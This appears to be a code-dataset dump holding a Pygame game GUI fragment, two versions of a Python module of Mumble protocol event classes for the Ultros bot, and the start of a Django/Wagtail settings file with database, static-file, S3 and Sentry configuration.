offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
for sprite in self.game_vars[SPRITE_LIST]:
if self.game_vars[ADJUSTED_RMOUSE_POS] == sprite.pos:
if sprite.type == "player":
if self.game_vars[FRIENDLY_FIRE]:
make_event(SURFACE, surf=self.friendly_highlight,
pos=(sprite.pos[0] * 80 + offset[0] + 8,
sprite.pos[1] * 80 + offset[1] + 6), z=0)
else:
make_event(SURFACE, surf=self.fight_highlight,
pos=(sprite.pos[0] * 80 + offset[0] + 8,
sprite.pos[1] * 80 + offset[1] + 6), z=0)
else:
if sprite.type == "monster":
make_event(SURFACE, surf=self.choosing_highlight,
pos=(sprite.pos[0] * 80 + offset[0] + 8,
sprite.pos[1] * 80 + offset[1] + 6), z=0)
elif sprite.type == "player" and self.game_vars[FRIENDLY_FIRE]:
make_event(SURFACE, surf=self.choosing_highlight,
pos=(sprite.pos[0] * 80 + offset[0] + 8,
sprite.pos[1] * 80 + offset[1] + 6), z=0)
def make_highlight_tile(self):
if not self.game_vars[PAUSE]:
if self.game_vars[ADJUSTED_RMOUSE_POS] in self.game_vars[MOVABLE_LIST]:
offset = (self.game_vars[RMOUSE_POS][0]+self.game_vars[GRID_OFFSET][0],
self.game_vars[RMOUSE_POS][1]+self.game_vars[GRID_OFFSET][1])
make_event(SURFACE, surf=self.move_highlight, pos=offset, z=0)
def make_pathing_highlight(self):
offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
for spot in self.game_vars[MOVABLE_LIST]:
make_event(SURFACE, surf=self.pathing_highlight.copy(),
pos=(spot[0] * 80 + offset[0],
spot[1] * 80 + offset[1]), z=0)
def display_pause_gui(self):
# The number subtracted to self.Engine.window_width should equal the width of the button
BUTTON_WIDTH = 400
x = (self.Engine.window_width - BUTTON_WIDTH) / 2
y = 150
self.gui_list.append(scripts.gui_elements.Button((x, y + 48, BUTTON_WIDTH, 48), self.GUITheme,
text="Unpause", action=make_event,
action_kwargs={"type": pygame.KEYDOWN, "key": pygame.K_ESCAPE}))
self.pause_gui_addresses.append(len(self.gui_list) - 1)
self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 2 + 16, BUTTON_WIDTH, 48), self.GUITheme,
text="Quit", action=self.display_quit_confirm))
self.pause_gui_addresses.append(len(self.gui_list) - 1)
self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 3 + 32, BUTTON_WIDTH, 48), self.GUITheme,
text="Toggle Fullscreen", action=make_event,
action_kwargs={"type": FLSCRN_TOGGLE}))
self.pause_gui_addresses.append(len(self.gui_list) - 1)
self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 4 + 48, BUTTON_WIDTH, 48), self.GUITheme,
text="Toggle Mute", action=make_event,
action_kwargs={"type": VAR_CHANGE, "key": MUTE,
"toggle": True}))
self.pause_gui_addresses.append(len(self.gui_list) - 1)
self.gui_list.append(scripts.gui_elements.Button((x, y + 48 * 5 + 64, BUTTON_WIDTH, 48), self.GUITheme,
text="(Not Implemented)"))
self.pause_gui_addresses.append(len(self.gui_list) - 1)
def dehover_guis(self):
for gui in self.gui_list:
if isinstance(gui, scripts.gui_elements.Button) and gui.state != DISABLED:
gui.state = BASE_STATE
gui.update_blit_image()
if isinstance(gui, scripts.gui_elements.ScrollingTextBox):
gui.hover = False
gui.update_message_board()
if isinstance(gui, scripts.gui_elements.InputTextBox):
gui.hover = False
gui.update_message_board()
def make_active_tile(self, engine):
self.active_highlight.update(engine)
active_sprite = self.Engine.Logic.active_sprite
active_pos = active_sprite.pos
center_offset = scripts.tools.center_offset((self.active_highlight.get_width(),
self.active_highlight.get_width()),
(80, 80))
offset = (active_pos[0] * 80 + self.game_vars[BOARD_OFFSET][0]
+ self.game_vars[GRID_OFFSET][0] + center_offset[0],
active_pos[1] * 80 + self.game_vars[BOARD_OFFSET][1]
+ self.game_vars[GRID_OFFSET][1] + center_offset[1])
make_event(SURFACE, surf=self.active_highlight.render(), pos=offset, z=0)
def is_mouse_on_gui(self):
mouse_pos = pygame.mouse.get_pos()
for gui in self.gui_list:
if scripts.tools.is_in_bounds(mouse_pos, (gui.position[0], gui.position[1],
gui.width, gui.height)):
return True
return False
def fight_clean_up(self):
self.fight_gui_addresses.reverse()
for address in self.fight_gui_addresses:
self.gui_list.pop(address)
self.fight_gui_addresses = []
def set_engine(self, new_engine):
self.Engine = new_engine
self.game_vars = new_engine.game_vars
def init(self, engine):
self.set_engine(engine)
self.set_up()
def display_fight_gui(self, player, target):
grid = self.Engine.Logic.grid
for i in range(len(player.abilities)):
ability = player.abilities[i]
button_x = 580 + i % 4 * 135
button_y = 740 + (int(i / 4)) * 110
button = scripts.gui_elements.AbilityButton((button_x, button_y), i, ability, self.GUITheme, player, target, grid)
button.update_usability()
self.gui_list.append(button)
self.fight_gui_addresses.append(len(self.gui_list) - 1)
def pause_clean_up(self):
self.pause_gui_addresses.reverse()
for gui in self.pause_gui_addresses:
self.gui_list.pop(gui)
self.pause_gui_addresses = []
def update_blit_banner(self):
make_event(SURFACE, surf=self.banner.render(), pos=self.banner.pos, z=4)
# If it has more to do it returns itself, otherwise it returns None
self.banner = self.banner.update(self.Engine)
def display_quit_confirm(self):
gui_elements = [
scripts.gui_elements.Button((0, 0, 150, 40), self.GUITheme, text="Yes", action=make_event,
action_kwargs={"type": pygame.QUIT}),
scripts.gui_elements.Button((0, 0, 150, 40), self.GUITheme, text="No", action=self.quit_confirm_clean_up)
]
self.DisplayBox = scripts.gui_elements.DisplayBox(gui_elements, title="Are you sure?")
def quit_confirm_clean_up(self):
self.DisplayBox = None
| 15,413 | 1 | 590 |
c5dc6a406b72c855d204ebef2026915104ccb941 | 10,616 | py | Python | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 16 | 2015-01-02T00:16:11.000Z | 2019-06-03T06:23:11.000Z | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 31 | 2015-01-18T12:14:53.000Z | 2018-01-07T13:32:29.000Z | system/events/mumble.py | UltrosBot/Ultros | 639efc11f73ebf7e8f47f0554aced00a559d9e2d | [
"Artistic-2.0"
] | 9 | 2015-02-13T09:38:53.000Z | 2020-11-29T19:59:32.000Z | # coding=utf-8
"""
Events specific to Mumble-based protocols
"""
__author__ = 'Gareth Coles'
from system.events.base import BaseEvent
class MumbleEvent(BaseEvent):
"""
A Mumble event. This will only be thrown from the Mumble protocol.
If an event subclasses this, chances are it's a Mumble event.
"""
class Reject(MumbleEvent):
"""
A reject - Sent when we aren't able to connect to a server
"""
type = ""
reason = ""
def __init__(self, caller, typ, reason):
"""
Initialise the event object.
"""
self.type = typ
self.reason = reason
super(Reject, self).__init__(caller)
class CodecVersion(MumbleEvent):
"""
Codec version message
"""
# TODO: Update this docstring when we know what this is for
alpha = ""
beta = ""
prefer_alpha = False
opus = ""
def __init__(self, caller, alpha, beta, prefer_alpha, opus):
"""
Initialise the event object.
"""
self.alpha = alpha
self.beta = beta
self.prefer_alpha = prefer_alpha
self.opus = opus
super(CodecVersion, self).__init__(caller)
class CryptoSetup(MumbleEvent):
"""
Crypto setup message
"""
# TODO: Update this docstring when we know what this is for
key = ""
client_nonce = ""
server_nonce = ""
def __init__(self, caller, key, client_n, server_n):
"""
Initialise the event object.
"""
self.key = key
self.client_nonce = client_n
self.server_nonce = server_n
super(CryptoSetup, self).__init__(caller)
class PermissionsQuery(MumbleEvent):
"""
Permissions query - Sent when.. we query permissions?
"""
# TODO: Update this docstring when we know what this is for
channel = None
permissions = ""
flush = ""
def __init__(self, caller, channel, permissions, flush):
"""
Initialise the event object.
"""
self.channel = channel
self.permissions = permissions
self.flush = flush
super(PermissionsQuery, self).__init__(caller)
class ServerSync(MumbleEvent):
"""
Server sync message - Sent when we connect to the server
"""
session = ""
max_bandwidth = ""
permissions = ""
welcome_text = ""
def __init__(self, caller, session, max_bandwidth, welcome_text,
permissions):
"""
Initialise the event object.
"""
self.session = session
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.permissions = permissions
super(ServerSync, self).__init__(caller)
class ServerConfig(MumbleEvent):
"""
Server config message
"""
# TODO: Update this docstring when we know what this is for
max_bandwidth = ""
welcome_text = ""
allow_html = True
message_length = 0
image_message_length = 0
def __init__(self, caller, max_bandwidth, welcome_text, allow_html,
message_length, image_message_length):
"""
Initialise the event object.
"""
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.allow_html = allow_html
self.message_length = message_length
self.image_message_length = image_message_length
super(ServerConfig, self).__init__(caller)
class Ping(MumbleEvent):
"""
A ping, I guess
"""
timestamp = ""
good = 0
late = 0
lost = 0
resync = 0
tcp = 0
udp = 0
tcp_avg = 0
udp_avg = 0
tcp_var = 0
udp_var = 0
def __init__(self, caller, timestamp, good, late, lost, resync, tcp, udp,
tcp_avg, udp_avg, tcp_var, udp_var):
"""
Initialise the event object.
"""
self.timestamp = timestamp
self.good = good
self.late = late
self.lost = lost
self.resync = resync
self.tcp = tcp
self.udp = udp
self.tcp_avg = tcp_avg
self.udp_avg = udp_avg
self.tcp_var = tcp_var
self.udp_var = udp_var
super(Ping, self).__init__(caller)
class UserRemove(MumbleEvent):
"""
User removal message
It looks like this is fired under three conditions..
* When a user disconnects or loses connection
* *kicker* will be None in that case
* When a user is kicked
* *kicker* will be set and ban will be False
* When a user is banned
* *kicker* will be set and ban will be True
This still requires some more research, the Mumble docs are awful.
"""
# TODO: Update this docstring when we're more sure of it
session = "" # Session ID
actor = "" # Session ID
user = None # User object
kicker = None # User object
reason = "" # Reason
ban = False # True if banned, false if kicked
def __init__(self, caller, session, actor, user, reason, ban, kicker):
"""
Initialise the event object.
"""
self.caller = caller
self.session = session
self.actor = actor
self.user = user
self.reason = reason
self.ban = ban
self.kicker = kicker
super(UserRemove, self).__init__(caller)
class Unknown(MumbleEvent):
"""
Unknown message - Called when we get a message that isn't already
handled
"""
type = ""
message = None
def __init__(self, caller, typ, message):
"""
Initialise the event object.
"""
self.type = typ
self.message = message
super(Unknown, self).__init__(caller)
class UserJoined(MumbleEvent):
"""
User join - Sent when a user joins the server
"""
user = None
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserJoined, self).__init__(caller)
class UserMoved(MumbleEvent):
"""
User moved - Sent when a user moves channel, or is moved
This is also fired when a user connects.
"""
user = None
channel = None
old_channel = None
def __init__(self, caller, user, channel, old):
"""
Initialise the event object.
"""
self.user = user
self.channel = channel
self.old_channel = old
super(UserMoved, self).__init__(caller)
class UserStateToggleEvent(MumbleEvent):
"""
Base class for events that are simply user state toggles
Don't use this directly; inherit it!
"""
user = None
state = False
actor = None
def __init__(self, caller, user, state, actor=None):
"""
Initialise the event object.
"""
self.user = user
self.state = state
self.actor = actor
super(UserStateToggleEvent, self).__init__(caller)
class UserMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted (but not by
themselves)
state: True if muted, False if unmuted
"""
pass
class UserDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened (but not
by themselves)
state: True if deafened, False if undeafened
"""
pass
class UserSuppressionToggle(UserStateToggleEvent):
"""
User suppression toggle - Sent when a user is suppressed or
unsuppressed
state: True if suppressed, False if unsuppressed
"""
pass
class UserSelfMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted by
themselves
state: True if muted, False if unmuted
"""
pass
class UserSelfDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened by
themselves
state: True if deafened, False if undeafened
"""
pass
class UserPrioritySpeakerToggle(UserStateToggleEvent):
"""
Priority speaker toggle - Sent when a user is set as priority speaker
state: True if set, False if unset
"""
pass
class UserRecordingToggle(UserStateToggleEvent):
"""
Recording toggle - Sent when a user starts or stops recording
state: True if started, False if stopped
"""
pass
class UserStats(MumbleEvent):
"""
User stats updated
user: User whose stats have been updated
"""
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserStats, self).__init__(caller)
class UserRegisteredEvent(MumbleEvent):
"""
Base class for user [un]registered events
Don't use this directly; inherit it!
"""
def __init__(self, caller, user, user_id, actor):
"""
Initialise the event object.
"""
self.user = user
self.user_id = user_id
self.actor = actor
super(UserRegisteredEvent, self).__init__(caller)
class UserRegistered(UserRegisteredEvent):
"""
User registered
user: User who has been registered
user_id: User's new ID
actor: User who registered `user`
"""
class UserUnregistered(UserRegisteredEvent):
"""
User unregistered
user: User who has been unregistered
user_id: User's old ID
actor: User who unregistered `user`
"""
class ChannelCreated(MumbleEvent):
"""
New channel - Sent when a channel is created
"""
channel = None
def __init__(self, caller, channel):
"""
Initialise the event object.
"""
self.channel = channel
super(ChannelCreated, self).__init__(caller)
class ChannelLinked(MumbleEvent):
"""
Channel link added - Sent when two channels are linked together
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelLinked, self).__init__(caller)
class ChannelUnlinked(MumbleEvent):
"""
Channel link removed - Sent when two channels have their link removed
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelUnlinked, self).__init__(caller)
| 20.815686 | 77 | 0.608986 | # coding=utf-8
"""
Events specific to Mumble-based protocols
"""
__author__ = 'Gareth Coles'
from system.events.base import BaseEvent
class MumbleEvent(BaseEvent):
"""
A Mumble event. This will only be thrown from the Mumble protocol.
If an event subclasses this, chances are it's a Mumble event.
"""
def __init__(self, caller):
super(MumbleEvent, self).__init__(caller)
class Reject(MumbleEvent):
"""
A reject - Sent when we aren't able to connect to a server
"""
type = ""
reason = ""
def __init__(self, caller, typ, reason):
"""
Initialise the event object.
"""
self.type = typ
self.reason = reason
super(Reject, self).__init__(caller)
class CodecVersion(MumbleEvent):
"""
Codec version message
"""
# TODO: Update this docstring when we know what this is for
alpha = ""
beta = ""
prefer_alpha = False
opus = ""
def __init__(self, caller, alpha, beta, prefer_alpha, opus):
"""
Initialise the event object.
"""
self.alpha = alpha
self.beta = beta
self.prefer_alpha = prefer_alpha
self.opus = opus
super(CodecVersion, self).__init__(caller)
class CryptoSetup(MumbleEvent):
"""
Crypto setup message
"""
# TODO: Update this docstring when we know what this is for
key = ""
client_nonce = ""
server_nonce = ""
def __init__(self, caller, key, client_n, server_n):
"""
Initialise the event object.
"""
self.key = key
self.client_nonce = client_n
self.server_nonce = server_n
super(CryptoSetup, self).__init__(caller)
class PermissionsQuery(MumbleEvent):
"""
Permissions query - Sent when.. we query permissions?
"""
# TODO: Update this docstring when we know what this is for
channel = None
permissions = ""
flush = ""
def __init__(self, caller, channel, permissions, flush):
"""
Initialise the event object.
"""
self.channel = channel
self.permissions = permissions
self.flush = flush
super(PermissionsQuery, self).__init__(caller)
class ServerSync(MumbleEvent):
"""
Server sync message - Sent when we connect to the server
"""
session = ""
max_bandwidth = ""
permissions = ""
welcome_text = ""
def __init__(self, caller, session, max_bandwidth, welcome_text,
permissions):
"""
Initialise the event object.
"""
self.session = session
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.permissions = permissions
super(ServerSync, self).__init__(caller)
class ServerConfig(MumbleEvent):
"""
Server config message
"""
# TODO: Update this docstring when we know what this is for
max_bandwidth = ""
welcome_text = ""
allow_html = True
message_length = 0
image_message_length = 0
def __init__(self, caller, max_bandwidth, welcome_text, allow_html,
message_length, image_message_length):
"""
Initialise the event object.
"""
self.max_bandwidth = max_bandwidth
self.welcome_text = welcome_text
self.allow_html = allow_html
self.message_length = message_length
self.image_message_length = image_message_length
super(ServerConfig, self).__init__(caller)
class Ping(MumbleEvent):
"""
A ping, I guess
"""
timestamp = ""
good = 0
late = 0
lost = 0
resync = 0
tcp = 0
udp = 0
tcp_avg = 0
udp_avg = 0
tcp_var = 0
udp_var = 0
def __init__(self, caller, timestamp, good, late, lost, resync, tcp, udp,
tcp_avg, udp_avg, tcp_var, udp_var):
"""
Initialise the event object.
"""
self.timestamp = timestamp
self.good = good
self.late = late
self.lost = lost
self.resync = resync
self.tcp = tcp
self.udp = udp
self.tcp_avg = tcp_avg
self.udp_avg = udp_avg
self.tcp_var = tcp_var
self.udp_var = udp_var
super(Ping, self).__init__(caller)
class UserRemove(MumbleEvent):
"""
User removal message
It looks like this is fired under three conditions..
* When a user disconnects or loses connection
* *kicker* will be None in that case
* When a user is kicked
* *kicker* will be set and ban will be False
* When a user is banned
* *kicker* will be set and ban will be True
This still requires some more research, the Mumble docs are awful.
"""
# TODO: Update this docstring when we're more sure of it
session = "" # Session ID
actor = "" # Session ID
user = None # User object
kicker = None # User object
reason = "" # Reason
ban = False # True if banned, false if kicked
def __init__(self, caller, session, actor, user, reason, ban, kicker):
"""
Initialise the event object.
"""
self.caller = caller
self.session = session
self.actor = actor
self.user = user
self.reason = reason
self.ban = ban
self.kicker = kicker
super(UserRemove, self).__init__(caller)
class Unknown(MumbleEvent):
"""
Unknown message - Called when we get a message that isn't already
handled
"""
type = ""
message = None
def __init__(self, caller, typ, message):
"""
Initialise the event object.
"""
self.type = typ
self.message = message
super(Unknown, self).__init__(caller)
class UserJoined(MumbleEvent):
"""
User join - Sent when a user joins the server
"""
user = None
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserJoined, self).__init__(caller)
class UserMoved(MumbleEvent):
"""
User moved - Sent when a user moves channel, or is moved
This is also fired when a user connects.
"""
user = None
channel = None
old_channel = None
def __init__(self, caller, user, channel, old):
"""
Initialise the event object.
"""
self.user = user
self.channel = channel
self.old_channel = old
super(UserMoved, self).__init__(caller)
class UserStateToggleEvent(MumbleEvent):
"""
Base class for events that are simply user state toggles
Don't use this directly; inherit it!
"""
user = None
state = False
actor = None
def __init__(self, caller, user, state, actor=None):
"""
Initialise the event object.
"""
self.user = user
self.state = state
self.actor = actor
super(UserStateToggleEvent, self).__init__(caller)
class UserMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted (but not by
themselves)
state: True if muted, False if unmuted
"""
pass
class UserDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened (but not
by themselves)
state: True if deafened, False if undeafened
"""
pass
class UserSuppressionToggle(UserStateToggleEvent):
"""
User suppression toggle - Sent when a user is suppressed or
unsuppressed
state: True if suppressed, False if unsuppressed
"""
pass
class UserSelfMuteToggle(UserStateToggleEvent):
"""
User mute toggle - Sent when a user is muted or unmuted by
themselves
state: True if muted, False if unmuted
"""
pass
class UserSelfDeafToggle(UserStateToggleEvent):
"""
User deaf toggle - Sent when a user is deafened or undeafened by
themselves
state: True if deafened, False if undeafened
"""
pass
class UserPrioritySpeakerToggle(UserStateToggleEvent):
"""
Priority speaker toggle - Sent when a user is set as priority speaker
state: True if set, False if unset
"""
pass
class UserRecordingToggle(UserStateToggleEvent):
"""
Recording toggle - Sent when a user starts or stops recording
state: True if started, False if stopped
"""
pass
class UserStats(MumbleEvent):
"""
User stats updated
user: User whose stats have been updated
"""
def __init__(self, caller, user):
"""
Initialise the event object.
"""
self.user = user
super(UserStats, self).__init__(caller)
class UserRegisteredEvent(MumbleEvent):
"""
Base class for user [un]registered events
Don't use this directly; inherit it!
"""
def __init__(self, caller, user, user_id, actor):
"""
Initialise the event object.
"""
self.user = user
self.user_id = user_id
self.actor = actor
super(UserRegisteredEvent, self).__init__(caller)
class UserRegistered(UserRegisteredEvent):
"""
User registered
user: User who has been registered
user_id: User's new ID
actor: User who registered `user`
"""
class UserUnregistered(UserRegisteredEvent):
"""
User unregistered
user: User who has been unregistered
user_id: User's old ID
actor: User who unregistered `user`
"""
class ChannelCreated(MumbleEvent):
"""
New channel - Sent when a channel is created
"""
channel = None
def __init__(self, caller, channel):
"""
Initialise the event object.
"""
self.channel = channel
super(ChannelCreated, self).__init__(caller)
class ChannelLinked(MumbleEvent):
"""
Channel link added - Sent when two channels are linked together
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelLinked, self).__init__(caller)
class ChannelUnlinked(MumbleEvent):
"""
Channel link removed - Sent when two channels have their link removed
"""
from_channel = None
to_channel = None
def __init__(self, caller, from_, to_):
"""
Initialise the event object.
"""
self.from_channel = from_
self.to_channel = to_
super(ChannelUnlinked, self).__init__(caller)
| 56 | 0 | 27 |
9adb43ddfd7c249bcc04844d8cc841ab379b1785 | 7,009 | py | Python | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | wagtail_template/settings/base.py | b-ggs/wagtail-template | d6b7dfe4ab2cf0af8f412148b394d7b44a6a278a | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for wagtail_template project.
Generated by 'django-admin startproject' using Django 4.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import dj_database_url
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
# Django env
DJANGO_ENV = os.environ.get("DJANGO_ENV", "production")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# Application definition
INSTALLED_APPS = [
"wagtail_template.home",
"wagtail_template.search",
"wagtail_template.utils",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"django_extensions",
"modelcluster",
"taggit",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise.middleware.WhiteNoiseMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
]
ROOT_URLCONF = "wagtail_template.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(PROJECT_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "wagtail_template.wsgi.application"
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
if "DATABASE_URL" in os.environ:
DATABASES = {
"default": dj_database_url.parse(os.environ["DATABASE_URL"]),
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = [
os.path.join(PROJECT_DIR, "static"),
]
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATIC_URL = "/static/"
# Media storage
if aws_storage_bucket_name := os.getenv("AWS_STORAGE_BUCKET_NAME"):
AWS_STORAGE_BUCKET_NAME = aws_storage_bucket_name
DEFAULT_FILE_STORAGE = "storages.backends.s3boto3.S3Boto3Storage"
AWS_ACCESS_KEY_ID = os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_S3_REGION_NAME = os.getenv("AWS_S3_REGION_NAME")
AWS_S3_CUSTOM_DOMAIN = os.getenv("AWS_S3_CUSTOM_DOMAIN")
AWS_LOCATION = os.getenv("AWS_LOCATION", "")
# Lines below this are likely only relevant for using Minio locally
AWS_S3_ENDPOINT_URL = os.getenv("AWS_S3_ENDPOINT_URL")
AWS_S3_USE_SSL = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
AWS_S3_SECURE_URLS = os.getenv("AWS_S3_USE_SSL", "true").lower() == "true"
# Wagtail settings
WAGTAIL_SITE_NAME = "wagtail_template"
# Search
# https://docs.wagtail.org/en/stable/topics/search/backends.html
WAGTAILSEARCH_BACKENDS = {
"default": {
"BACKEND": "wagtail.search.backends.database",
}
}
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = os.getenv("BASE_URL", "")
ALLOWED_HOSTS = os.getenv("ALLOWED_HOSTS", "").split(",")
SECRET_KEY = os.getenv("SECRET_KEY", "")
# Error reporting
# https://docs.sentry.io/platforms/python/guides/django/
# https://glitchtip.com/sdkdocs/python-django
if sentry_dsn := os.getenv("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.utils import get_default_release
SENTRY_ENVIRONMENT = DJANGO_ENV
# Attempt to get release version from Sentry's utils and a couple other environment variables
SENTRY_ARGS = {
"dsn": sentry_dsn,
"integrations": [DjangoIntegration()],
"environment": SENTRY_ENVIRONMENT,
"release": get_release_version(),
"traces_sample_rate": 0.01,
}
# Auto session tracking is not supported by GlitchTip
if "sentry.io" in sentry_dsn:
SENTRY_ARGS["auto_session_tracking"] = True
else:
SENTRY_ARGS["auto_session_tracking"] = False
sentry_sdk.init(**SENTRY_ARGS)
# Enables URL to test Sentry integration
ENABLE_SENTRY_TEST_URL = (
os.environ.get("ENABLE_SENTRY_TEST_URL", "false").lower() == "true"
)
| 29.952991 | 97 | 0.709231 | """
Django settings for wagtail_template project.
Generated by 'django-admin startproject' using Django 4.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import dj_database_url
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
# Django env
DJANGO_ENV = os.environ.get("DJANGO_ENV", "production")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# Application definition
INSTALLED_APPS = [
"wagtail_template.home",
"wagtail_template.search",
"wagtail_template.utils",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"django_extensions",
"modelcluster",
"taggit",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# Simplified static file serving
# https://devcenter.heroku.com/articles/django-assets
# https://warehouse.python.org/project/whitenoise/
"whitenoise.middleware.WhiteNoiseMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
]
ROOT_URLCONF = "wagtail_template.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(PROJECT_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "wagtail_template.wsgi.application"
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
